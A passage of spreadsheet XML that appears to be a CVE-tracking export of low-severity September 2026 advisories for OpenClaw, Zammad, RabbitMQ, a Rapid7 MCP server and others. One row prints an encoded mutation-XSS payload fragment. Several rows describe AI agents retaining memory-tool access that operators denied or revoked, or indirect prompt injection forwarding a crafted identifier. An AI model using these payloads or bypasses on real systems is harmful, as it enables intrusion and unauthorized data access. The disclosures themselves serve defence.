        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 fails to apply the originating requester's effective tool policy during Active Memory automatic recall. In deployments that use Active Memory together with requester-specific tool rules, deterministic and hidden recall paths can retrieve durable memory and inject it into the agent's context even when toolsBySender explicitly denies that requester access to the memory tools (memory_search, memory_get). As a result, an admitted but denied sender can receive information derived from durable memory in the agent's response without directly invoking any memory tool. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100537</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100542</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.5.28 and &lt; 2026.8.1 mishandle archive listings in the tar.bz2 skill installer: bounded command-output suffixes were treated as complete listings of the archive. A crafted .tar.bz2/.tbz2 skill archive can push prohibited entries out of both retained listings so that entry-count and size checks pass, and the archive is then extracted in full. If an operator approves installation of such a malicious or compromised skill archive, over-limit files or entry counts are persisted in the skill tools directory, consuming disk space or inodes. The issue bypasses OpenClaw's extraction budgets but does not by itself execute archive contents. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100542</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97866</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-300</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Zhonglun CloudPOS 3.0. Affected by this vulnerability is an unknown functionality of the file Program.cs of the component Automatic Update. Executing a manipulation of the argument version/url/packagekey/package name can lead to channel accessible by non-endpoint. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97866</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97228</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Rapid7 Bulk Export MCP versions 0.2.5 through 0.6.1 suffer from a GraphQL query injection issue in the export-status component (`get_export_status` in `src/export_manager.py`), whereby the `export_id` value — an unvalidated MCP tool argument reaching the function via the `check_rapid7_export_status` and `download_rapid7_export` tools — is interpolated directly into the GraphQL query string. A crafted `export_id` containing quote and brace characters can terminate the intended `export(id: "...")` selection early and append attacker-controlled root-level selections (for example, schema introspection), producing a single well-formed GraphQL document that is then sent to the Rapid7 export API under the operator's own API key.
Notably, this issue does not grant an existing actor any access they do not already have: every injected query executes within the operator's own already-authenticated API scope, using the operator's own valid API key, and cannot cross a tenant or account boundary. A directly-malicious operator gains nothing they could not already do by calling the API directly; the realistic exposure is limited to a compromised or careless upstream MCP client, or indirect prompt injection forwarding an unvalidated identifier. This is fixed in version 0.6.2, which passes `export_id` as a parameterized GraphQL variable (`$exportId: ID!`).</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97228</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97721</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Sanluan PublicCMS up to 6.202506.e. This vulnerability affects the function CmsContentAdminController of the file publiccms-parent/publiccms-core/src/main/java/com/publiccms/controller/admin/sys/SysUserAdminController.java of the component exportExcel/exportData. This manipulation of the argument userId/deptId causes authorization bypass. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97721</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100539</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>2.6</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 fails to revoke memory tool access when an operator hot-disables memory configuration. Existing memory_search and memory_get tool instances retain the enabled configuration captured at creation time because the execution-time resolver treats explicit disablement like an unavailable configuration snapshot and restores the stale authority. As a result, during an already-running agent turn the model can continue searching and reading durable memory after the operator revoked that access, for the remainder of that run. Exploitation requires memory to be disabled while a previously created memory tool remains active. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100539</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75553</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>Smartphone application Tohoku Electric Power "Yorisou e Net" uses a hard-coded cryptographic key, which may allow an attacker to retrieve a hard-coded cryptographic key from the affected product.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75553</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63204</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, an authenticated user with agent permissions can supply an arbitrary AI analytics run identifier to the ticket summarize endpoint and receive the AI provider error message stored for that run, even if the run belongs to a ticket the agent is not authorized to access. The disclosure is limited to the provider error string; ticket content is not exposed. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63204</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65828</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, the legacy destroy_form action on AttachmentsController deletes UploadCache Store records based solely on a user-supplied form_id without verifying that the requesting user owns those records. An authenticated attacker who learns another user's pending-upload UUID can silently remove temporary file uploads before the victim submits their ticket or article. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65828</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67234</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, get_auth_mechanism/1 used term_to_binary/1 on the strict_auth_mechanism or preferred_auth_mechanism atom when clearing the corresponding cookie, producing a non-ASCII cookie name that violates RFC 6265 and can prevent the browser from deleting the preference. The issue is not directly exploitable for code execution or data exfiltration; its security relevance is limited to stale authentication-mechanism preferences persisting across logout and login cycles. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67234</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67420</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5, RabbitMQ OAuth credential refresh retains revoked runtime tags. when an existing AMQP connection refreshes from an OAuth token that grants the impersonator tag to a valid same-username token that no longer grants that tag, RabbitMQ updates the OAuth backend implementation (token/scopes/expiry) but leaves the connection's runtime #user.tags unchanged. rabbitaccesscontrol:checkuserid/2 then still honors the stale impersonator tag, so the connection (including newly opened channels) can continue publishing messages with a foreign AMQP userid after that privilege should have been revoked. A fresh connection using the downgraded token correctly refuses the same publish, proving the defect is stale session state rather than the token Limited to connections that once held impersonator and successfully refresh to a downgraded same-username rabbitauthbackendoauth2 (or an equivalent refresh-capable backend that returns tags) is enabled for This issue is fixed in versions 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67420</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92106</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dashbitco lazy_html allows mutation XSS via a parse and serialize round-trip of attacker-supplied HTML.
LazyHTML.to_html/2 and LazyHTML.Tree.to_html/2 decide whether to escape an element's text from its tag name alone. A style or script element inside SVG or MathML foreign content is parsed with character references decoded, but is serialized as an HTML raw-text element, so its text is emitted unescaped. Encoded markup such as &amp;lt;/style&amp;gt;&amp;lt;img src=x onerror=...&amp;gt; inside &lt;svg&gt;&lt;style&gt; therefore closes the element on re-parse and becomes live markup. Applications that parse untrusted HTML with lazy_html, filter the document or tree, and serialize it for display are affected, since the payload is a plain text node that no element or attribute filter sees.
This issue affects lazy_html: from 0.1.0 before 0.1.13.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92106</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96874</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in the Mediawiki - Cargo extension allows Stored XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96874</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56729</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-280, CWE-284</t>
        </is>
      </c>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, when multiple KB categories have different editor roles assigned, a user with knowledge_base.editor in one category can see answer titles and updated_at timestamps from categories they do not have editor access to , via the global quick search. Category names are not leaked, and opening the answer returns "Page not found," but the title alone may disclose sensitive information. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56729</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56730</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, an authorization bypass vulnerability was found that allows an authenticated agent to read knowledge base answer content they should not be able to access. The vulnerable GraphQL mutation is meant to transform a knowledge base answer suggestion so it can be inserted into the ticket editor, but it only checks if the user has the ticket.agent permission. Checking the authorization to the knowledge base answer itself is missing. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56730</t>
        </is>
      </c>
    </row>
    <row r="433">
